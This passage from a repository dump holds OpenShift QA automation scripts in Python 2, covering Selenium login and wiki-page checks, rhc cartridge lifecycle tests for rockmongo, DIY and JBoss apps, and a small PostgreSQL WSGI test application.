os.path.split(suite_name)\nreport = \"%s_Report.html\" % os.path.join(logFolder, suiteName)\nlog = \"%s_Log.html\" % os.path.join(logFolder, suiteName)\noutputXmls = []\nif pybot != None:\n outputXmls.append(os.path.join(logFolder, pybot.output))\nfor pybot in pybots:\n outputXmls.append(os.path.join(logFolder, pybot.output))\n\nreportRC = generateReportAndLog(outputXmls, report, log)\n\n\n# delete XML output files after generating the report / log (if report generation \n# returned zero)\n#if reportRC == 0:\n# for outXML in outputXmls:\n# os.remove(outXML)\n\n# calculating test execution time\nendTime = datetime.now()\nexecutionTime = endTime - startTime\nprint \"\"\nprint \"Execution time: %s\" % executionTime\n" }, { "alpha_fraction": 0.6034482717514038, "alphanum_fraction": 0.6050646305084229, "avg_line_length": 26.294116973876953, "blob_id": "feb8f79238ecd8739eebedc5a6c35c218479f848", "content_id": "fd790c9d5bf208aed201ef834bd585bbd1282a3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1856, "license_type": "no_license", "max_line_length": 97, "num_lines": 68, "path": "/automation/open/testmodules/UI/login/login.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import rhtest\nimport database\nimport time\nimport autoweb\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = \"UI\"\n\n def initialize(self):\n #tb = self.config.testbed\n self.ip = self.config.instance_info['ip']\n self.info(\"IP: %s\" % self.ip)\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n self.web = self.config.web\n \n\n def finalize(self):\n self.info(\"Closing webdriver\")\n print self.driver\n self.web.driver.close()\n\nclass LoginPage(OpenShiftTest):\n def test_check_login_form(self):\n self.web.go_to_home()\n self.web.go_to_signin()\n self.web.assert_element_present_by_link_text(\"Forgot your password?\")\n self.web.assert_element_present_by_link_text(\"create an account\")\n self.web.assert_element_present_by_css(\"input.btn\")\n \n def test_login_invalid_user(self):\n \"\"\" test invalid user \"\"\"\n self.web.go_to_home()\n self.web.go_to_signin()\n self.web.login(\"baduser\", \"vostok08\")\n self.web.assert_text_equal_by_css(\"Invalid username or password\",\"div.alert.alert-error\")\n\n def test_method(self):\n errorCount = 0\n self.test_check_login_form()\n self.test_login_invalid_user()\n #web = self.config.web\n # test_check_login_form\n #web.go_to_home()\n #web.go_to_signin()\n\n self.info(\"Test: Check login form\")\n\n if errorCount:\n return self.failed(\"LoginPage test failed.\")\n else:\n return self.passed(\"LoginPage test passed.\")\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LoginPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5897868871688843, "alphanum_fraction": 0.60118168592453, "avg_line_length": 32.842857360839844, "blob_id": "61145f3c4653ea16a7b2f4e8fdec33412a86fa7f", "content_id": "cb126827b506aa30bd68af30b75a3b3011316a04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4739, "license_type": "no_license", "max_line_length": 126, "num_lines": 140, "path": "/automation/open/testmodules/RT/cartridge/rhc_ctl_rockmongo.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 12, 
2011\n\n[US1545][BusinessIntegration][embed_web_interface]Control rockmongo using 'rhc cartridge'\nhttps://tcms.engineering.redhat.com/case/123974/\n\"\"\"\nimport os,sys,re\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.summary = \"[US1545][BusinessIntegration][embed_web_interface]Control rockmongo using 'rhc cartridge'\"\n        try:\n            self.test_variant = self.get_variant()\n        except:\n            self.test_variant = 'jbossews'\n        self.app_name = self.test_variant.split('-')[0] + common.getRandomString(4)\n        self.app_type = common.app_types[self.test_variant]\n        self.steps_list = []\n        common.env_setup()\n\n    def finalize(self):\n        pass\n\nclass RhcCtlRockmongo(OpenShiftTest):\n\n    def test_method(self):\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Create an %s app: %s\" % (self.app_type, self.app_name),\n            common.create_app,\n            function_parameters = [self.app_name, self.app_type],\n            expect_description = \"App should be created successfully\",\n            expect_return = 0))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"embed mongodb into app %s\"% self.app_name,\n            common.embed,\n            function_parameters = [self.app_name, \"add-mongodb-2.2\"],\n            expect_return = 0))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"embed rockmongo into app %s\"% self.app_name,\n            common.embed,\n            function_parameters = [self.app_name, \"add-rockmongo-1.1\"],\n            expect_return = 0))\n\n        self.steps_list.append( testcase.TestCaseStep(\n            \"check whether rockmongo is working\",\n            self.check_rockmongo,\n            expect_return = 0))\n\n        self.steps_list.append( testcase.TestCaseStep(\n            \"stop rockmongo of app %s\"% self.app_name,\n            common.embed,\n            function_parameters = [self.app_name, \"stop-rockmongo-1.1\"],\n            expect_return = 0))\n\n        self.steps_list.append( testcase.TestCaseStep(\n            \"check whether rockmongo is stopped\",\n            self.check_rockmongo,\n            function_parameters = ['True'],\n            expect_return = 0))\n\n        self.steps_list.append( testcase.TestCaseStep(\n            \"start rockmongo in app %s\"% self.app_name,\n            common.embed,\n            function_parameters = [self.app_name, \"start-rockmongo-1.1\"],\n            expect_return = 0))\n\n        self.steps_list.append( testcase.TestCaseStep(\n            \"check whether rockmongo is working\",\n            self.check_rockmongo,\n            expect_return = 0))\n\n        self.steps_list.append( testcase.TestCaseStep(\n            \"restart rockmongo in app %s\"% self.app_name,\n            common.embed,\n            function_parameters = [self.app_name, \"restart-rockmongo-1.1\"],\n            expect_return = 0))\n\n        self.steps_list.append( testcase.TestCaseStep(\n            \"check whether rockmongo is working\",\n            self.check_rockmongo,\n            expect_return = 0))\n\n        self.steps_list.append( testcase.TestCaseStep(\n            \"reload rockmongo in app %s\"% self.app_name,\n            common.embed,\n            function_parameters = [self.app_name, \"reload-rockmongo-1.1\"],\n            expect_return = 0))\n\n        self.steps_list.append( testcase.TestCaseStep(\n            \"check whether rockmongo is working\",\n            self.check_rockmongo,\n            expect_return = 0))\n\n\n        case = testcase.TestCase(self.summary, self.steps_list)\n        try:\n            case.run()\n        except testcase.TestCaseStepFail:\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n    def check_rockmongo(self, negative = False):\n        keyword = \"RockMongo\"\n        if negative:\n            keyword = \"503 Service Temporarily Unavailable\"\n        url = 
OSConf.get_embed_info(self.app_name, common.cartridge_types[\"rockmongo\"], \"url\")+\"/index.php?action=login.index\"\n ret = common.grep_web_page(url, keyword, options=\"-k -H 'Pragma: no-cache'\", delay=8, count=10)\n os.system(\"curl -k -H 'Pragma: no-cache' %s\"% url)\n return ret\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcCtlRockmongo)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5820964574813843, "alphanum_fraction": 0.5899814367294312, "avg_line_length": 36.17241287231445, "blob_id": "b45c5fdd5db9f18c396526afaa5976888d4f5c95", "content_id": "22800093daf508eee0142a6bc603a1cb437f7a64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2156, "license_type": "no_license", "max_line_length": 279, "num_lines": 58, "path": "/automation/open/testmodules/RT/cartridge/app_template/postgresql/python-2.7/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport psycopg2\n\n\nconn_str = \"dbname=%s user=%s password=%s host=%s port=%s\" % (os.environ['OPENSHIFT_APP_NAME'], os.environ['OPENSHIFT_POSTGRESQL_DB_USERNAME'], os.environ['OPENSHIFT_POSTGRESQL_DB_PASSWORD'], os.environ['OPENSHIFT_POSTGRESQL_DB_HOST'], os.environ['OPENSHIFT_POSTGRESQL_DB_PORT'])\n\ndef create_data(data):\n conn = psycopg2.connect(conn_str)\n cur = conn.cursor()\n cur.execute(\"DROP TABLE IF EXISTS info;\")\n cur.execute(\"CREATE TABLE info(id integer PRIMARY KEY, data text);\")\n cur.execute(\"INSERT INTO info VALUES(1, '%s');\" % (data))\n conn.commit()\n conn.close()\n\ndef get_data():\n conn = psycopg2.connect(conn_str)\n cur = conn.cursor()\n cur.execute(\"SELECT data FROM info;\")\n result = cur.fetchone()\n conn.close()\n return result[0]\n\n\ndef application(environ, start_response):\n ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n response_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/data1.py':\n create_data(\"#str_random1#\")\n response_body = 'Please visit /show.py to see the data'\n elif environ['PATH_INFO'] == '/data2.py':\n create_data(\"#str_random2#\")\n response_body = 'Please visit /show.py to see the data'\n elif environ['PATH_INFO'] == '/show.py':\n response_body = get_data()\n else:\n response_body = 'PostgreSQL test'\n\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.5794411897659302, "alphanum_fraction": 0.6057130694389343, "avg_line_length": 43.39814758300781, "blob_id": "a175c9673c1bae4add9a5a909ee75941399f994d", "content_id": "94a39bb0381003a5affc35c4576679c245e70242", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4796, "license_type": "no_license", "max_line_length": 186, "num_lines": 108, "path": "/automation/open/testmodules/UI/web/case_165723.py", 
"repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_165723.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckWikiIndexPage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n \n #check with invalid password\n #web.go_to_home()\n web.go_to_community()\n web.click_element_by_xpath('''//a[contains(@href, '/community/open-source')]''')\n web.click_element_by_xpath('''//a[contains(@href, '/community/wiki/index')]''')\n time.sleep(2)\n\n #check the \"architecture-overview\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[2]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Architecture Overview''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build Multi-node PaaS from scratch\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[3]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Multi-node PaaS from scratch''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build Your Own PaaS\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[4]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own PaaS''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build Your Own Paas from the OpenShift Origin LiveCD using liveinst\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[5]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own Paas from the OpenShift Origin LiveCD using liveinst''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build Your Own PaaS: Base Operating System and Configuration\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[6]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own PaaS: Base Operating System and Configuration''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build Your Own PaaS: Installing the Broker\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[7]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own PaaS: Installing the Broker''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"build-your-own\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[8]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''build-your-own''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Build-your-own/prepare-the-base-os\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[9]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build-your-own/prepare-the-base-os''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Community Process\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[10]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Community 
Process''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \"Connect to Openshift Origin installation with JBoss Tools\" link \n web.click_element_by_xpath('''//div[@id='node-9485']/div/table/tbody/tr[11]/td/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Connect to Openshift Origin installation with JBoss Tools''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n\n self.tearDown()\n\n return self.passed(\" case_165723--CheckWikiIndexPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckWikiIndexPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_165723.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5842253565788269, "alphanum_fraction": 0.61183100938797, "avg_line_length": 25.08823585510254, "blob_id": "54304e78553a921c9eb977ec85d44f8028737658", "content_id": "4e3e7860cacf4aeb62bc574a3ed03d37652a1e7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1775, "license_type": "no_license", "max_line_length": 151, "num_lines": 68, "path": "/automation/open/testmodules/UI/web/case_135723.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_135723.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Change_domain(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Change domain name\n web.go_to_account_page()\n time.sleep(10)\n web.click_element_by_link_text(\"Change your namespace...\")\n web.clear_element_value(\"domain_name\")\n web.input_by_id(\"domain_name\", \"yujzhangtest11\") \n web.click_element_by_id(\"domain_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath('''yujzhangtest11''', '''//div[@id='content']/div/div/div/div[2]/div/div[2]/div/section[2]/div/strong''') \n\n \n web.click_element_by_link_text(\"Change your namespace...\")\n web.clear_element_value(\"domain_name\")\n web.input_by_id(\"domain_name\", \"yujzhang\") \n web.click_element_by_id(\"domain_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath('''yujzhang''', '''//div[@id='content']/div/div/div/div[2]/div/div[2]/div/section[2]/div/strong''') \n\n self.tearDown()\n\n return self.passed(\"Case 135723 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Change_domain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_135723.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5245901346206665, "avg_line_length": 14.25, "blob_id": "988a55fc0da0e032b6e0d55f2193199b7708b469", "content_id": "e4697667ae0fe191a04953c75701f87dd50b329a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 61, "license_type": "no_license", 
"max_line_length": 20, "num_lines": 4, "path": "/README.md", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Some of my practices\n====================\n\nDo some practices\n" }, { "alpha_fraction": 0.6689265370368958, "alphanum_fraction": 0.6892655491828918, "avg_line_length": 21.66666603088379, "blob_id": "bcceea8ca5677619c7cace252869b1097dc8f5be", "content_id": "3168138e7c9e980708578c765c929d222194fbac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 885, "license_type": "no_license", "max_line_length": 69, "num_lines": 39, "path": "/automation/open/testmodules/RT/cartridge/jbosseap_scaling_java6.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\[email protected]\n\nJul 26, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport os\nfrom shutil import rmtree\nfrom time import sleep\nfrom jbossas_java6 import JBossJava6Test\n\nclass EAPScalingJava6Test(JBossJava6Test):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types[\"jbosseap\"]\n self.config.git_repo = \"./%s\" % self.config.application_name\n self.config.scalable = True\n self.config.java_version = \"1.6\"\n\tself.config.summary = \"[US2218] Java 6 with scaling EAP application\"\n\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPScalingJava6Test)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n" }, { "alpha_fraction": 0.5204545259475708, "alphanum_fraction": 0.5261363387107849, "avg_line_length": 34.55555725097656, "blob_id": "e87b1e0d6f3193cec93657356e05b682c2a075c7", "content_id": "a037fb5337b07162669e890229cd94b96b9365e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3520, "license_type": "no_license", "max_line_length": 141, "num_lines": 99, "path": "/automation/open/testmodules/RT/client/create_app_with_option.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type = \"perl-5.10\"\n self.app_name = \"testapp\"\n self.app_repo = \"/tmp/%s_repo\" %(self.app_name)\n tcms_testcase_id= 154268,142464\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass CreateAppWithOption(OpenShiftTest):\n def test_method(self):\n\n step = testcase.TestCaseStep(\"Create app with -n option\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd, False],\n expect_return=0,\n expect_string_list=[\"no local repo has been created\"],\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check git repo dir\",\n \"ls %s\" %(self.app_name),\n expect_return=\"!0\",\n expect_string_list=[\"No such file or directory\"],\n 
expect_description=\"There should no git repo dir\"\n )\n step.add_clean_up(common.destroy_app, [self.app_name, self.user_email, self.user_passwd])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Clean targe path to prepare the next test\",\n \"rm -rf %s && ls %s\" %(self.app_repo, self.app_repo),\n expect_return=\"!0\",\n expect_string_list=[\"No such file or directory\"],\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Create app with -r option\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd, True, self.app_repo],\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check git repo is cloned to specified path\",\n \"ls %s\" %(self.app_repo),\n expect_return=0\n )\n step.add_clean_up(\"rm -rf %s\" %(self.app_repo))\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"Create app with -n/-r option\",\n self.steps_list\n )\n case.run()\n\n\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateAppWithOption)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.4881482720375061, "alphanum_fraction": 0.4979504644870758, "avg_line_length": 37.96527862548828, "blob_id": "fd05ab079436a2dbfd8e04642b1a3e3c96a86d51", "content_id": "577d89b8a081f9d153d85f4685ecfa99f2a4c308", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5611, "license_type": "no_license", "max_line_length": 172, "num_lines": 144, "path": "/automation/open/testmodules/RT/client/rhc_tail_files_options.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf, proc\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.test_variant=self.config.test_variant\n self.app_name = \"tailoptions\" + common.getRandomString(4)\n self.testname_to_type = { \"php\" : \"php-5.3\",\n \"rack\" : \"ruby-1.8\",\n \"wsgi\" : \"python-2.6\",\n \"perl\" : \"perl-5.10\",\n \"ruby-1.9\" : \"ruby-1.9\",\n }\n self.app_type = self.testname_to_type[self.test_variant]\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n tcms_testcase_id=122404\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\ndef create_proc(cmd):\n return proc.Proc(cmd)\n\nclass RhcTailFilesOptions(OpenShiftTest):\n def test_method(self):\n case = testcase.TestCase(\"[US478][rhc-cartridge]Perl cartridge: tail/snapshot perl application files\", [])\n step = dict()\n output = dict()\n\n\n # 1.Create an php app\n step[1] = testcase.TestCaseStep(\"1. 
Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0\n )\n (retcode, output[1]) = step[1].run()\n # 2.Access the app to generate some access log\n app_url = OSConf.get_app_url(self.app_name)\n test_html = \"Welcome to OpenShift\"\n step[2] = testcase.TestCaseStep(\"2.Access the app to generate some access log(Not working for jbossas app)\",\n common.grep_web_page,\n function_parameters=[app_url, test_html, \"-H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0\n )\n (retcode, output[2]) = step[2].run()\n\n\n count = 2 # recording the number of step\n\n option_lst = [ \"\", # Check if access_log changes\n \"-o '-n 2'\",\n \"-o '-c 3'\",\n \"-o '-q'\",\n \"-f %s/logs/access_log* -o '-v'\" % (self.app_name),\n \"-o '--test'\",\n \"-o '-F'\",\n ]\n regex_lst = [ r\"GET / HTTP.*?curl.*?libcurl\", # Check if access_log changes\n r\"error_log.*\\n.*\\n.*\\n(?=\\n|$)\",\n r\"error_log.*\\n.{2}\\n(?=\\n|$)\",\n r\"==> %s/logs/.*?log\" % (self.app_name),\n r\"==> %s/logs/.*?log\" % (self.app_name),\n r\"/usr/bin/tail: unrecognized option '--test'\",\n r\"%s/logs/error_log\" % (self.app_name),\n ]\n for i in range(len(option_lst)):\n option = option_lst[i]\n regex = regex_lst[i]\n # 2.Run rhc tail in subprocess\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Run rhc tail in subprocess with option: '%s'\" % (count, option),\n create_proc,\n function_parameters=[\"rhc tail %s -l %s -p '%s' %s %s\" % (self.app_name, self.user_email, self.user_passwd, option, common.RHTEST_RHC_CLIENT_OPTIONS),],\n expect_description=\"rhc tail should be started\",\n )\n (retcode, output[count]) = step[count].run()\n p = retcode\n try:\n # 3.Check the option takes effect\n if i in (3,):\n exp_ret = 1\n else:\n exp_ret = 0\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Check if option: '%s' takes effect\" % (count, option),\n p.grep_output,\n function_parameters=[regex, 3, 5, 0],\n expect_description=\"Function should return %d\" % (exp_ret),\n expect_return=exp_ret\n )\n (retcode, output[count]) = step[count].run()\n finally:\n # 4.Kill the rhc tail subprocess\n count += 1\n step[count] = testcase.TestCaseStep(\"%d.Kill subprocess: rhc tail %s\" % (count, option),\n p.kill,\n function_parameters=[],\n expect_description=\"subprocess should be killed\",\n expect_return=0,\n )\n (retcode, output[count]) = step[count].run()\n \t\n\t if retcode==0:\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\t else:\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcTailFilesOptions)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5526506900787354, "alphanum_fraction": 0.5603485703468323, "avg_line_length": 37.458099365234375, "blob_id": "3371bb4f264f4dfac49388faaf3c69dd8a86a0b4", "content_id": "32c706def210ed1a11aa408888eac263cd456907", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6885, "license_type": "no_license", "max_line_length": 132, "num_lines": 179, "path": "/automation/open/testmodules/RT/cartridge/diy_customized.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": 
"#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nFeb 20, 2012\n\n[rhc-cartridge][US1651] Idea: Customized raw cartridges\nhttps://tcms.engineering.redhat.com/case/135842/\n\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport commands\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_type = 'diy'\n self.summary = \"[rhc-cartridge][US1651] Idea: Customized raw cartridges\"\n self.app_name = 'my%s%s' % ( self.app_type, common.getRandomString() )\n self.git_repo = './' + self.app_name\n self.steps = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass RawCustomized(OpenShiftTest):\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\n 'Creating an application',\n common.create_app,\n function_parameters = [ self.app_name, \n common.app_types[self.app_type],\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n True, self.git_repo ],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Checking the new welcome message\",\n self.check_webpage_output,\n function_parameters = [ self.app_name, \n \"\", \n \"Do-It-Yourself cartridge\" ],\n expect_description = 'The proxy error-message should be customized, OpenShift branded',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Setting up custom Django application\",\n self.custom_app_setup,\n expect_description = \"Our custom Django app should be installed succesfully\",\n expect_return = 0))\n \n self.steps.append(testcase.TestCaseStep(\n \"Cheking the output of our Django project\",\n common.grep_web_page,\n function_parameters = [self.get_app_url(\"/version/\"), \"131final0\", \"-H 'Pragma: no-cache'\", 5, 4],\n expect_description = \"The output of your Django project should show the right version number\",\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Stopping the application\",\n common.stop_app,\n function_parameters = [ self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = \"The application should be stopped successfully\",\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Checking the output of the stopping Django project\",\n common.grep_web_page,\n function_parameters = [self.get_app_url(\"/version/\"), \"Service Temporarily Unavailable\", \"-H 'Pragma: no-cache'\", 5, 4],\n expect_description = 'The proxy error-message should be customized, OpenShift branded',\n expect_return = 0))\n\n 